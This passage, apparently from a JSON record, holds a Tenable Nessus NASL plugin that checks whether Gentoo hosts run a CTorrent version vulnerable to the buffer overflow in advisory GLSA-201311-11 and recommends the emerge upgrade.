text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201311-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70995);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1759\");\n script_bugtraq_id(34584);\n script_xref(name:\"GLSA\", value:\"201311-11\");\n\n script_name(english:\"GLSA-201311-11 : CTorrent: User-assisted arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201311-11\n(CTorrent: User-assisted arbitrary code execution)\n\n CTorrent contains a stack-based buffer overflow in the\n btFiles::BuildFromMI function in trunk/btfiles.cpp.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted\n torrent file using CTorrent, possibly resulting in execution of arbitrary\n code with the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201311-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CTorrent users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-p2p/ctorrent-3.3.2-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ctorrent\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-p2p/ctorrent\", unaffected:make_list(\"ge 3.3.2-r1\"), vulnerable:make_list(\"lt 3.3.2-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CTorrent\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}